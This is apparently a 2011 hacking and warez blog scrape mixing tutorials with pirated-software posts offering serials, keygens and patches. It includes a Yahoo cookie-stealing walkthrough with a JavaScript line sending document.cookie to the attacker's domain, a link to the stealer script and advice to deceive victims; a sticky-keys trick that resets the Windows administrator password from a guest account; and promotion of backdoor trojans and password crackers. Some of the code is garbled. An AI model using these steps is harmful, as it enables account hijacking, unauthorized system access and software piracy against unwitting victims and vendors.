Monday 31 October 2011

How to Find An Email Address of Facebook Friend


Facebook has an advance and smart privacy setting and you can easily hide your email and other information from any person. So let suppose your friend is a master of Facebook privacy and you want to know his/her email address for whatever purpose.

In this tutorial we will show you the best and smart way to get email of a friend from facebook.

Requirement
Yahoo account
The person should be your friend on Facebook
A brain (Most important)

Go to (address.yahoo.com) and click the Facebook icon, a dialog box will be appear that will ask your permission.

It takes some time and than you are done, you can see email addresses of your friends. Check the name of the person to whom you have to find the email and than you can easily find any email of Facebook friend.
WebRepOverall rating

How to Hack Yahoo Accounts By Stealing Session Cookies






WHat are cookies?
A cookie is a small piece of text sent to your browser by a website when you visit. It contains information about your visit that you may want the site to remember. Thesecookies can be stored in your browser.you can see your cookies by typing the following script in your browser.


javascript:alert(document.cookie);                                                     




Session and session IDs:
Whenever we login to our account, our session starts and it will be ended when we press the logout button.i.e the duration between the login and logout can be called as a session.A session ID is a unique number that a Web site's server  assigns a specific user for the duration of that user's visit(session ).




Procedure:
Step 1: Download this Script:




 http://www.ziddu.com/download/16640354/cookiestealerdevz.rar.html


Step:2 Download and extract files into your hard drive.


Step:3 Create a account in any ftp hosting site i suggest
110 mb
rip way
my 3gb
drive hq


  
Step4: Login to your account and upload 4 files into your ftp account.




Step5: Give this  code to victim to run in his browser when he would be logged in to his yahoo account. Yahoo.php is basically cookie stealing script and hacked.php executes the stolen cookies in browser.[You have to Use social engineering techniques fr this thing to ensure the victim that it is Safe for HIm]
Stolen cookies get stored in directory


'cookies'javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concates(cape(document.cookie)); 


He would again redirected to his yahoo account.


step6. Open the hacked.php . The password is 'explore'.


You must have got the username of victim's account. Simply Click on it and it would take you to inbox of victim's yahoo account without asking for any password


NOTE: You can check try this by using two browsers. Take one browser as victim's and the second one as your's.NOTE: It Will Only Work in case of Http

Mobile As Webcam


Mobile As Webcam!!

wireless cameraactually costs higher that I was unable to afford. Later this thing came in my mind. Why can’t I turn my Bluetooth enabled cell phone in to wireless webcam?

After doing several researches, I finally hit the success. That’s why I would like to share this to you too. To turn my cell phone in to wireless webcam I needed only extra ...thing that is Bluetooth adapter for my desktop. I purchased it from the local market.

Let’s summarize things you’ll need:

-Cell phone with java, Bluetooth and camera in it.

-Bluetooth adapter for desktop

-Computer

-Software that will turn your phone in to wireless webcam

Now lets begin with the tutorial.

Download and install Smart Cam V1.5 for your desktop. Now again download the favorable cell phone software from here. If you have symbian OS in your cell phone then download the correct symbian version, or you can download the java version as well. After downloading install it to your cell phone.

Now you’ll need to pair your Cell phone with computer from Bluetooth.

Run smart cam program in windows. And open smart cam in your cell phone as well.

In windows, choose Bluetooth as the connection in Files>settings.



In cell phone select connect and choose the Computer device in range.

Remember your PC must be visible to everyone in order to detect the PC by cell phone.

If everything went well, you’ll be seeing through cell phone’s camera in your computer.

You can use it as webcam in instant messengers like hotmail and yahoo.

Saturday 29 October 2011

Recover windows xp after virus attack

Hello guys , as we all know nowadays virus attacks are very common and we have to have lot of problems because of viruses like task manager does not opens,folder options missing, registry has been disabled by administrator,cannot find dll and so on. These are very common problems and can happen with any of us so we must know to fix these problems without formatting your windows XP. Most of the virus infects your basic programs i.e task manager,registry,group policy editor,boot up,folder properties etc. Today i will tell how to Fix windows Xp after virus attack in this article. So guys read on...
          
software,tool,hack tool,fix windows


There are several free tool in the market that can help you to fix your windows xp after virus attacks but i always come with complete package. Don't worry friends its also a free tool but using this you can recover almost every windows services and functionality within few seconds and that's also without formatting. Why i am telling all this is because we must know how to recover along with how to hack and hacking...

The features of the tool that i have discussed above is called QUICK FIX.
Quick fix is really an outstanding tool. Its an complete solution of a to z windows XP problems. You can recover back from all types of virus attacks using this tool.

Below are some Important Features:
1. Enable Task Manager
2. Enable Registry
3. Enable Folder Options
4. Restore missing run dialog
5. Enable Command Prompt(cmd)
6. Stop My Documents to open at start up
7. Restore Device manager.
8. Fix Delay at start up.
9 Fix Recovery Console
and much more....

So Guys why are you waiting Download Quick Fix and Fix your windows problems wasily in a single click..


DOWNLOAD QUICK FIX:

I hope you all have liked this... If you have any queries ask me.

Footprinting - Attack Methods

Attack Methods





The attacker may choose to source the information from:


* A web page (save it offline, e.g. using offline browser such as Teleport pro


* Yahoo or other directories. (Tifny is a comprehensive search tool for USENET newsgroups.


* Multiple search engines (All-in-One, Dogpile), groups.google.com is a great resource for searching large numbers of news group archives without having to use a tool.


* Using advanced search (e.g. AltaVista),


* Search on publicly trade companies (e.g. EDGAR).


* Dumpster diving (To retrieve documents that have been carelessly disposed)


* Physical access (False ID, temporary/contract employees, unauthorized access etc)

There are four RIRs, each maintaining a whois database holding details of IP address registrations in their regions. The RIR whois databases are located at:

*
ARIN (North America and sub-Saharan Africa)
*
APNIC (Asia Pacific region)
*
LACNIC (Southern and Central America and Caribbean)
*
RIPE NCC (Europe and northern Africa)
Tools
There are tools available to aid a whois lookup. Some of them are Sam Spade (downloadable from www.samspade.org). Smart Whois (downloadable from www.tamos.com). Netscan (downloadable from www.netscantools.com) and GTWhois (Windows XP compatible) (www.geektools.com) etc.

Tool: NeoTrace (Now McAfee Visual Trace)

NeoTrace is a diagnostic and investigative tool. It traces the network path across the Internet from the host system to a target system anywhere on the Internet. Automatic retrieval of data includes registration details for the owner of each computer on the route (address, phone, email address) and the network each node IP is registered to. Easy to read views of the data include a world map showing the locations of nodes along the route, a graph showing the relative response time of each node along the path, and a configurable list of node data.


In the screenshot shown above, we have done a traceroute for www.google.com The 3.20 version had node view, map view and list view. Note that the DNS entries have been retrieved for the various nodes and the map view allows the user to see relatively easily if a particular system is based geographically where it claims to be.

There are two aspects to traceroute - depth and breadth. There are two basic methods for searching graphs - breadth and depth. Breadth searches branch out examining all nodes within a certain hop distance, slowly increasing until the destination is discovered. Depth first search follows one path until it is exhausted, and then backs up slowly recalculating all the permutations of the preceding paths. Traceroute generates an UDP message to an unused port and sends this message with an increasing TTL value. The search ends when a port unreachable message is received.


There are many ICMP error messages that can be generated. One of these messages is ICMP port unreachable (since ports exist in TCP or UDP). However, the port unreachable message must be distinguished from such messages generated from different applications - such as from a packet filtering device

3D PageFlip for PowerPoint v1.0.0 + Serial

3D PageFlip for PowerPoint v1.0.0 + Serial || File Size : 9.55 MB. 
3DPageFlip for PowerPoint is a powerful flash flippingbook creator tool to create flash-based interactive content from PowerPoint slide shows with 3D page flip effect. It offers a time-saving way to create rich-media 3D interactive presentations for easy publishing and online sharing.

You can create amazingly realistic 3D interactive magazines, catalogs, brochures, books or newspapers from Microsoft PowerPoint in minutes without any Flash/HTML or programming skills.
By converting a PowerPoint documentation to Flash presentation, it inherits the strength of Microsoft PowerPoint, and extends it with smaller file size, greater multimedia integration, easier accessibility and more trusted security.

The pages turn with the option of rolling the entire book in three dimensions, and this induces a feeling in users as if they are holding an actual book in their hands.
Use realistic 3D page flip magazines effect to promote your book, boost your book's sales or to demonstrate your book in realistic, visual 3D animation!

Product Features

1. Convert PPT to Flash eBook with 3D page turning effect.
2. Apply a pre-designed template.
3. Export and save settings or projects for future uses.
4. Define book Title.
5. Enable Auto Flip with setting Flip Interval.
6. Set Google ID to analyze visited pages in your 3D eBook.
7. Enable users to share via Facebook, iGoogle, Myspace, Twitter, Digg etc.
8. Set Share ID (ID in AddThis website: http://www.addthis.com/) to analyze shared times of your 3D eBook.
9. Set Zoom Modal to zoom in single page or double pages together.
10. Input Presenter information such as name, website address, Email and details info to show in About Window.
10. Choose color for Tool Bar.
11. Define logo and linked webpage to show on Tool Bar.
12. Pre-set tilt angle while opening the eBook.
13. Set background with pure/gradient color or image directly (5 positions for background image: Fill, Fit, Stretch, Tile and Center).
13. Insert background sound and define loop status.
14. Output to different formats: HTML, ZIP, EXE, Mobile Version and Burn to CD.
• HTML allows you to upload to a website to be viewed online (with title, keywords and other metadata defined).
• EXE (with setting title, icon and open window size) and Zip allow you to send to your user by email to be viewed on their computer.
• Mobile version is to output HTML 3D flipbook which can be viewed on mobile devices via Browsers.
• Burn to CD allows you to burn to disk so that you can send your user physical media for viewing on their computer.

Output 3D flash magazines Features
With the 3D flash flipping book you have created, your user will be able to:

1. Click Page frame bar or navigational buttons to turn pages.
2. View with important pages pre-loaded to open quickly, no need to wait for all pages to be loaded.
3. Go to website by clicking the eBook logo.
4. Double-click or click zoom in/out button to zoom in or zoom out pages.
5. Define zoom in scales manually.
6. Manually define Tilt Angle or wheel mouse to change angle to view eBook pages.
7. Flip pages automatically.
8. Turn page-turning sound on/off.
9. View eBook detail information.
10. Share eBook URL via Email, iGoogle, Facebook, Twitter, Digg, etc.
11. Print out the whole eBook or a selected range of pages.
12. View page-flipping eBook in full screen.
13. Open in the Browser to a specific page by adding a page index to your URL. E.G.http://www.yourdomain.com/.
14. View page-flipping eBooks on iPad, iPhone and Android devices.

Install notes:
Install
Use included serial to register

XUS Desktop Professional Edition 1.6.69 (32+64 bit) + Serial Key

XUS Desktop Professional Edition 1.6.69 (32+64 bit) + Serial Key || 
File Size : 2.87 MB. 
XUS Desktop is a powerful desktop icon manager application. With XUS Desktop, you can easily organize your windows desktop icons. It can make your windows desktop clear, beautiful, and let you to handle shortcut icons. XUS Desktop also offers a new, easy, fast & swift way to launch the program.

It will free your windows desktop icons. If you are tired with Windows desktop, please try XUS Desktop – it is the best desktop application you have ever used. You will feel like using XUS Desktop all the time.

Key features:
1. Easy to organize your windows desktop icons;
2. Fast & swift way to launch the program;
3. Make you windows desktop clear and beautiful;
4. Offers a different & wonderful feel to use your computer;
5. More useful and helpful functions;
6. Offers a perfect solution to handle too much desktop icon's problem.

Operating System Support:

Windows XP, Vista, 2008, 7 (32+64 Bits)

How to install:

1. Disable your internet connection
2. Extract from ".rar" file by using Winrar
3. Install from "XUS Desktop Professional Edition v1.6.69.exe
4. Run the program
5. Register the program with given Registration Key
6. OK/Register

Done....!!!!

Watery Desktop 3D

Watery Desktop 3D || File Size : 1 MB. 

Add life to your desktop wallpaper! Watery Desktop 3D will animate your wallpaper with water effects, such as waves and rain. It will also work as a screen saver which floods your screen, you'll see how everything on your desktop will sink into water.

Complete Quran In Inpage Format Arabic & Urdu

Complete Quran In Inpage Format Arabic & Urdu || File Size : 1.5 MB. 


Complete Quran In Inpage Format Arabic & Urdu

Seed it & Enjoy it!

Hack window Admin password from a guest Account without any tool



* Go to C:/windows/system32
* Copy cmd.exe and paste it on desktop
* Rename cmd.exe to sethc.exe
* Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.
When asked to overwrite,overwrite the sethc.exe
* Now log ut from your guest account and at the user select window,press shift key 5 times.
* Instead of sticky Key confirmation dialog,command prompt with full administrator privileges will open.
* Now type “ NET USER ADMINISTRATOR aaa” where “aaa” can be any password you like and press enter.
* You will see “ The command completed successfully” and then exit the command prompt and login into administrator with your new password.
* Congrats You have hacked admin from guest account.

Friday 28 October 2011

RAR Password Cracker

Are you really looking for password recovery software for Microsoft® Office (Word/Excel/Access) or Money? www.PasswordRecoveryTools.com!
or
use Rixler Password Recovery Server for guaranteed decryption Microsoft® Word/Excel files. Also, Rixler Software offers password recovery tools for most of Email, FTP and Messenger Clients, popular Browsers, MS Office appications, Zip, Windows Logon and others.

System requirements ::    RAR Password Cracker requires Windows 9x/ME/XP/NT4/2000/2003. There are no special requirements for memory capacity, but the processor performance should be as high as possible. Special hardware is not required.

What's new
Version 4.12
  • Fixed: Permanent crashes on some types of files.
  • Added: New type of licenses: low-cost time-limited fully functional version.
Version 4.11
  • Fixed: Memory management to avoid "Not enough memory" error.
  • Fixed: RAR 2.00-2.80 performance degradation.
  • Added: "First uppercase, rest lowercase [Password]" modificator.

Download 
RAR Password Cracker 4.xx is shareware. You may download free evaluation version of the software:
Version 4.12 (zip, 201 Kb):
Version 4.12 (exe, 205 Kb):

Crack Windows Passwords

security software Crack Windows PasswordsHave you ever tried to log into a Windows computer for a few minutes and you finally realize that you forgot the password?
There’s a way to crack the password and it doesn’t involve reformatting and reinstalling Windows.
The solution is called @stake LC4 (formerly L0phtCrack), however since Symantec stopped development of L0phtcrack, I’m going to let you in on a program called LC5.
Just like L0phtCrack, LC5 attacks your Windows machine with a combination of dictionary and brute force attacks.
LC5 can crack almost all common passwords in seconds. More advanced passwords with numbers and characters takes longer.
The main purpose of the LCP program is user account passwords auditing and recovery in Windows NT/2000/XP.
I haven’t tested it against Windows Vista yet, so I’m not sure if it will work. Your mileage may very either way.
How it works:
Windows NT, 2000 and XP passwords are stored as encrypted hashes. LC5 attacks these hashes with hundreds of passwords per minute.
Eventually the correct password will be sent and then displayed to the screen.
Good intentions:
  • System administrators can find weak passwords within minutes. Sys admins can then change the passwords to make them more secure.
  • LC5 can be used to access computers of users who forget passwords.
  • In companies, it can be used to access computers of employees who have left the company.
Bad intentions:
  • Hackers can use LC5 to sniff passwords over networks.
  • Hackers can install this application onto a primary domain controller and steal hundreds of passwords within minutes.
Please note that I am not the author of this software. Be advised that if you use this software, you do so at your own risk without any warranty expresses
Download LC5 (v5.04):
Software License: LCP is a freeware program. The program may be distributed under condition of saving all files contents and structure of installation package.
There is another solution that works instantly to remove all Windows Passwords.  Windows Geeks Removal Tools will do everything for you without waiting.  It will Remove, Unlock and Bypass lost/forgotten passwords including Administrator for Windows Vista, 2000, 2003 XP and NT. Windows Vista/XP/2003/Server Password Solution

Wednesday 26 October 2011

Three Most used Backdoor Programs

There is a general misconception about security today. Most people would love to believe that their firewalls are completely capable to protect them from anything indecent. The sad part, they could not be more wrong. Hungry Hacker aim to prove it with three separate programs that can compromise the security of computers. You have the opportunity to say “What’s a backdoor?” Yes, these programs were created in 1990, but still pose a real threat today. It is the first two that are still being developed.
Using these programs any noob can remotely access your computer without any Authentication and do whatever he wants. I will tell you some of the features rest of them you need to try it and find out. These Programs :
  • Work as a key logger.
  • Send any Information from Victim’s PC to the Hacker’s PC.
  • Run any program on the Victims PC.
  • Display any Violating Image on victim’s Screen.
  • Open the CD Drive of the Victim’s PC.
  • Open any Web page on the Victims Screen.
  • Disable any Specific Key or whole Keyboard.
  • Shutdown Victim’s PC.
  • Start a Song on the Victim’s PC.etc.etc…………..
Back Orifice / Back Orifice 2000
Back Orifice is one of the most common backdoor programs, and one of the most deadly. The name may seem like a joke, but sure, the threat is real. Back Orifice was established in Cult of the Dead Cow group. Back Orifice is an Open Source Program. The main Threat of this software is that by making some changes in the code anybody can make it undetectable to the Anti virus Program running on the Victim’s computer. Apart from the strange title, the program usually gets port 31337, the reference to “Lit” phenomenon is popular among hackers.
Back Orifice uses a client-server model, while the server and client is the victim attacker. What makes Back Orifice so dangerous that it can install and operate silently. There is not required interaction with the user in, meaning you could its on your computer right now, and do not know.
Companies such as Symantec have taken steps to protect computers against programs that they consider dangerous. But even more attacks using Back Orifice 2000. This is due partly to the fact that it is still evolving, as open source. As stated in the documentation the goal is ultimately the presence of the Back Orifice 2000 unknown even to those who installed it.
Back Orifice 2000, developed for Windows 95, Windows 98, Windows NT, Windows 2000 and Windows XP.
Where can I download Back orifice 2000?
Back Orifice 2000 can be downloaded at the following address: http://sourceforge.net/projects/bo2k/
I infected! How do I remove it?
Removing Back Orifice 2000 may require that you change the registry settings. To remove it at 7 simple steps, refer to the diagram below.
How do I delete Back orifice 2000
  1. Click Start> Run, and type “Regedit”(without the quotes)
  2. Follow the path below: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices “
  3. Now looking in the right box: “The umgr32 = ‘c: \ windows \ system \ umgr32.exe”
  4. Right-click on this entry and click Remove. Now restart your computer.
  5. After restarting only open Windows Explorer. Make sure you can see all registered extensions. To do so, select “View Options and configure the appropriate settings.
  6. Go to the WINDOWS \ SYSTEM directory, and find “umgr32.exe” file. Once you find it, delete it.
  7. Exit Windows Explorer and reboot again.
NetBus / Netbus 2.0 Pro
NetBus was established around the same time that the Back Orifice was in the late 1990′s. NetBus was originally designed as a program prank friends and family, of course anything too malicious. However, the program was released in 1998, and is widely used as a backdoor to manage computer.
Like the Back Orifice, NetBus allows attackers to do virtually everything in the computer victim. It also works well under Windows 9x systems, as well as Windows XP. Unlike Back Orifice, the latest version of NetBus regarded shareware is not free. NetBus is also implementing less stealthy operations, as a direct result of criticism and complaints of abusive use.
Where can I buy and download NetBus?
NetBus can be purchased and downloaded at the following address: http://www.netbus.org/
Ok, I am infected. Now what?
Fortunately, the latest version of NetBus is a valid program. It can be removed just like any other program. Previous issuance NetBus is a bit more tricky, however. If you are not lucky enough attacked with the latest version, the withdrawal process and in the Back Orifice.
How do I remove NetBus?
  1. Click Start> Run, and type “Regedit ‘(without the quotes)
  2. Follow the path below: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices “
  3. Now, in the right box, looking as follows: “[Name_of_Server].”Exe Of course, you have to find the actual name of this file EXE-. Usually This” Patch.exe ‘or’ SysEdit.exe “, but may vary.
  4. Reboot and remove all traces of the actual program, which can be left. Additionally, you can set yourself NetBus, and then use its own function disposal.
SubSeven / Sub7
SubSeven or Sub7, has been established for the same purpose was to NetBus pranks. Sub7 actually has more support for pranks, and has more advanced users. Sub7 also widely used by the script kiddies, although that many firewalls and anti-virus software before initialization.
Since Sub7 not supported for several years, the threat is usually very low. Most security programs will not have any problem in ending Sub7 before it has a chance to be started. This shows that the importance to the modernization and security programs is critical, because the money was still there.
Nevertheless, it is widely used by those who have physical access to your firewall, or security programs. If access rights, the tool will work without restrictions.
Where can I buy and download Sub7?
Sub7 not supported more, and hence is not available for download on any legitimate websites. If you were to make a Google search, you would find links to download Sub7. However, this is not the official site, and should be considered dubious and dangerous.
Sounds harmless, How do I remove it?
  1. End of the following processes through the curator: “editserver.exe, subseven.exe”
  2. Delete the following files: “editserver.exe, subseven.exe, tutorial.txt.”
Why these programs is absolutely legitimate?
All the basis behind these programs is that they are designed to help people, not harm. While some like NetBus really were originally created for pranks, they switched routes to avoid legal problems.
These programs claim to be the legitimate remote desktop program, although they certainly easily used for malicious use. These programs really should be used to aid or customer support departments. Why all adolescents is to copy these programs goes beyond us, but leave the content of their networks, while computer is a good idea.
The advent of new technology has made these programs in some respects less effective. However, programs such as Back Orifice 2000, yet still evolving, so do not be surprised to learn that he works in the background, waiting for instructions. Since the best defense is a good offense, be sure to save a sharp eye on what is installed on the network computers. After all, an ounce of prevention is worth a pound of cure.

Tool: SmartWhois

SmartWhois is a network information utility that allows the user to find all the available information about an IP address, hostname, or domain, including country, state or province, city, name of the network provider, administrator and technical support contact information.




Unlike standard Whois utilities, SmartWhois can find the information about a computer located in any part of the world, intelligently querying the right database and delivering all the related records in a short time. The program can retrieve information from more than 20 servers all over the world. SmartWhois can also save obtained information to an archive file. This is particularly useful in tracking incidents and incident handling. It allows users to load this archive the next time the program is launched and add more information to it. Thus, the list is updated on a regular basis. This feature allows building and maintaining a user defined database of IP addresses and hosting names. Alternatively, users can also load a list of IP addresses as a text file and have SmartWhois process the whole list. SmartWhois is available for download at www.tamos.com SmartWhois is capable of performing both IP address/hostname and domain name queries. TamoSoft, Inc. also hosts a tools interface at http://all-nettools.com/tools1.htm

Top 20 Hacking Tools

These are Top 20 Hacking Tools, the list is exhaustive, this are a few to name.
The “Nessus” Project aims to provide to the internet community a free, powerful, up-to-date and easy to use remote security scanner for Linux, BSD, Solaris, and other flavors of Unix.
Ethereal is a free network protocol analyzer for Unix and Windows. Ethereal has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session.
Snort is an open source network intrusion detection system, capable of performing real-time traffic analysis and packet logging on IP networks.
Netcat has been dubbed the network swiss army knife. It is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol
TCPdump is the most used network sniffer/analyzer for UNIX. TCPTrace analyzes the dump file format generated by TCPdump and other applications.
Hping is a command-line oriented TCP/IP packet assembler/analyzer, kind of like the “ping” program (but with a lot of extensions).
DNSiff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.).
GFI LANguard Network Security Scanner (N.S.S.) automatically scans your entire network, IP by IP, and plays the devil’s advocate alerting you to security vulnerabilities.
>Ettercap is a multipurpose sniffer/interceptor/logger for switched LAN. It supports active and passive dissection of many protocols (even ciphered ones)and includes many feature for network and host analysis.
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 2500 potentially dangerous files/CGIs, versions on over 375 servers, and version specific problems on over 230 servers.
John the Ripper is a fast password cracker, currently available for many flavors of Unix.
OpenSSH is a FREE version of the SSH protocol suite of network connectivity tools, which encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other network-level attacks.
Tripwire is a tool that can be used for data and program integrity assurance.
Kismet is an 802.11 wireless network sniffer – this is different from a normal network sniffer (such as Ethereal or tcpdump) because it separates and identifies different wireless networks in the area.
NetFilter and iptables are the framework inside the Linux 2.4.x kernel which enables packet filtering, network address translation (NAT) and other packetmangling.
IP Filter is a software package that can be used to provide network address translation (NAT) or firewall services.
OpenBSD Packet Filter
fport identifys all open TCP/IP and UDP ports and maps them to the owning application.
SAINT network vulnerability assessment scanner detects vulnerabilities in your network’s security before they can be exploited.
OpenPGP is a non-proprietary protocol for encrypting email using public key cryptography. It is based on PGP as originally developed by Phil Zimmermann.
I still don’t know why people take it for granted to download virus protection software, and they wonder why their computers get hacked into.

Monday 24 October 2011

PictureMerge Genius v2.8.1 Software + Patch

PictureMerge Genius v2.8.1 Software + Patch || File Size : 1.72 MB. 


Picture Merge Genius is a simple and easy-to-use program for merging your photos, images and pictures. The software can combine multiple pictures into one in different ways, In the new picture you can also set the size and position of the source files.

Picture Merge Genius is useful for computer painters, ebay seller, photographer, designers and family entertainment.

Picture Merge Genius support more than 40 picture file format(JPEG, BMP, TIFF, PCX, PNG, TGA, PBM, PGM, PPM, GIF, VDA, ICB, VST, PIX, WMF, FAX, PSD, PDD, PSP, CUT and PCD etc.).

Installation :
1. Unpack
2. Install
3. Use Patch

Photo Makeup Editor 1.51 Software + Key

Photo Makeup Editor 1.51 Software + Key || File Size : 3.17 MB.


Photo Makeup Editor is a photo retouching and virtual makeup software. You can make your photo more beautiful and even change your style! The program offers 10 unique face enhancement tools. It lets you achieve outstanding results in minutes, making the photo truly glamorous!

The name of Photo Makeup Editor speaks for itself. It's all about making photographed people look better. If you forgot to do your morning makeup the day one of your favorite pictures was taken, doesn't worry – this software program got it all covered! From regular makeup procedures to changing the hair color and even performing digital “plastic surgery” – all of these features are available in Photo Makeup Editor immediately after installation.

If you like to experiment with your appearance or just need to be able to quickly add a little twist to your familiar photos, doesn't look for anything complex or professional – all you need is a decent photo retouch tool. Photo Makeup Editor is an ideal candidate for the job, so give this awesome digital makeup tool a try as soon as possible!

Key Features:
* Apply lipstick, rouge, eye shadow, and powder.
* Apply line eyelids and change eye color.
* Reduce or remove wrinkles. Fix skin blemishes.
* Reshape any aspect of the face and body.
* Allows you to lighten up the skin or add a suntan.
* Change hair color or even highlight hair.
* Change facial expression. Create attractive smile.
* Adjust brightness, contrast and color on the face.

Installation :
1. Unpack
2. Install
3. Use Serial Key



Download :  Photo Makeup Editor 1.51 Software + Key

Mind Power into the 21st Century


 
Mind Power into the 21st Century || PDF ||
English || 148 Pages || File Size : 5.90 MB.

With so many books to choose from on the topic of the power of positive thought, it can be challenging to decide which one to pick. You need a book that is clear and concise, one that makes sense, and one that has helpful advice to help you achieve your goals. Mind Power Into the 21st Century is such a book.

Kehoe's work is full of excellent observations, very helpful advice, and quotes from others throughout history who have put their own positive thoughts to good use. He delves into the very useful techniques of visualization, seeding, affirmations, acknowledging, working with the subconscious mind, and more. Kehoe also has specific chapters dedicated to achieving your goals on the subjects of relationships, health, and money.

Download : Mind Power into the 21st Century

Folder Hider for Nokia and All JAR Supported Phones

Folder Hider for Nokia and All JAR Supported Phones || File Size : 112.71 KB.


This software can Hide ur personal Folders in ur memory card or ur Phone Memory and u can delete virus and malicious files with this software like system volume information and ETC.


Download : Folder Hider for Nokia and All JAR Supported Phones

Total Doc Converter 2.2.0.191 Software + Serial Key


Total Doc Converter 2.2.0.191 Software + Serial Key || File Size : 7.39 MB. 


Total Doc Converter solves the problem of converting Doc, DocX, DocM, RTF or TXT files to HTML, PDF, XLS, JPG, TIFF, or Text. Besides, Total Doc Convetrer can also convert RVF files (Rvf to PDF, Excel, HTML, JPEG, TIFF, RTF, Text). The program is handy and powerful. Transparent interface makes it easy even for a beginner to figure out how it works. In fact you don't even have to launch the program.

Total Doc Converter can seamelessly integrate into Windows, which means that you can just select the file on your desktop, make a right button click and press Convert to.
Besides, there is command line support. It is quite helpful for those who wants to launch Total Doc Converter from within other programs. Note that Shape&ImageBox option is not supported.

Total Doc Converter is very practical when you have to convert thousands of files. Use Batch converting option to convert humdreds of files and the process won't take you long. Download it now for free and make sure it's the best doc conversion solution.

The latest version of Total Doc Converter supports DocX (the format of Word 2007 documents). Having installed this Microsoft Office Compatibility Pack you can convert DocX files to HTML, PDF, XLS, JPG, TIFF, TXT with Total Doc Converter.

We have also added several options to deal with fonts: now you can define the output font name, font size and font style (bold, underline, italic, strike out). For the perfectly neat output we also added WordWrap option. Use it if you do not want the lines in your document wrap.

Here are some key features of "Total Doc Converter":
• WordWrap option
• Set font name
• Set font size
• Set font style (Bold, Underline, Italic, StrikeOut)
• Autosize (landscape/portrait files fit into page perfectly)

Installation :
1. Unpack
2. Install
3. Use Key
4. Enjoy it



PhotoInstrument 5.1.511 Software + Serial Key


 
PhotoInstrument 5.1.511 Software + Serial Key || File Size : 3.33 MB.


PhotoInstrument is a powerful and easy-to-learn raster graphics editor used to process digital photographs. With only a few clicks, anyone can solve most digital photo problems: Photo Editing; Photo Retouch; Draw MakeUp. Make your photo looks like its taken by professional photographer. If you ever wonder to touch up your photo, so you look more beautiful on your facebook or friendster or even on myspace, well this software is answer your question.

Current version includes these tools:
• Liquify
• Clone
• Smudge
• Skin Cleaner
• Glamour Skin
• Dodge / Burn
• Brush
• Blur
• Sharpen
• Colorize
• Rotate / Scale
• Red Eye Removal
• Brightness-Contrast
• Adjust Color Levels
• Glow
• Healing Brush
• Denoise
• Object Removal

Supported languages:
• English
• Bulgarian
• Czech
• Dutch
• French
• German
• Hungarian
• Italian
• Korean
• Polish
• Portuguese
• Russian
• Serbian
• Spanish
• Simplified Chinese
• Turkish

Installation :
1. Unpack
2. Install
3. Use Key
4. Enjoy it


Download : PhotoInstrument 5.1.511 Software + Serial Key

Fast Mailer Pro 6.6 Software + Serial Key



Fast Mailer Pro 6.6 Software + Serial Key || File Size : 2.03 MB. 


Fast Mailer Pro is a fast subscription-based mass mailer used by many Internet professionals and online store owners, to notify their customers about various events and send requested newsletters. This program lets you create and manage subscription-based mailing lists, and send personalized email messages utilizing message templates. You can easily define messages and insert macro substitution patterns, to be replaced by information from the customer database, for each recipient, just before dispatching. You can use all the standard message formats like plain text, HTML or even create a rich content message in the Microsoft Outlook Express and export it into the program. Fast Mailer Pro is easy-to-configure and lets you import an email mailing list of your existing subscribers along with all data fields into the internal database quickly and easily. It lets you do filter-based manipulations on your email list, search for duplicate emails and enable or disable individual subscribers. The program also has a subscription confirmation feature you can use to confirm that your sending is really solicited.

Security Tools - password and security tools to protect PC

1st Security Agent - protect and secure Windows PC
Security Administrator - protect PC and restrict access
Public PC Desktop - setup public access PC
Network Security Protector - network PC security
Easy Desktop Keeper - backup, restore, lock desktop layout
Disk Drive Security - protect your disk drives
File & Folder Protector - password protect files and folders
1st Evidence Remover - clean PC and remove evidence
CD-DVD Lock - password protect CD/DVD/HDD/Floppy
Access Administrator - password protect files
Access Lock - lock access to PC with password

Internet Tools - email and Internet tools, SMTP servers and mass mailers

Mass Mailer for Mac - send email to mac subscribers
Mail Bomber - organize email subscription
Fast Mailer Pro - send email to subscribers fast
Mail Server Pro - high-performance SMTP/POP3 server
Fast Mail Server - super SMTP/POP3 mail server
Local SMTP Relay Server - send emails directly
Easy Backup for Outlook Express - save, restore your data

Website Map - links to different useful pages of this website

Home Page - our home page with the full list of our software
Products - the full list of our software with detailed descriptions
About Us - information about our company
Contact Us - web form you can use to contact us
1st Security Agent FAQ - questions and answers related to 1st Security Agent
Security Administrator FAQ - questions and answers related to Security Administrator
Mail Bomber FAQ - questions and answers related to Mail Bomber
Fast Mailer Pro FAQ - questions and answers related to Fast Mailer Pro
Local SMTP Relay Server FAQ - questions and answers related to Local SMTP Relay Server
Email Security FAQ - questions and answers related to Email Security
1st Evidence Remover FAQ - questions and answers related to 1st Evidence Remover
Public PC Desktop FAQ - questions and answers related to Public PC Desktop
Sales Related FAQ - sales related questions and answers
Antispam Policy - our antispam policy
Privacy Policy - our privacy policy

OS : Win XP/2000/Vista/Win 7
Language : English

Installation :
1. Unpack
2. Install
3. Use Keygen
4. Enjoy it 



 
Tricks and Tips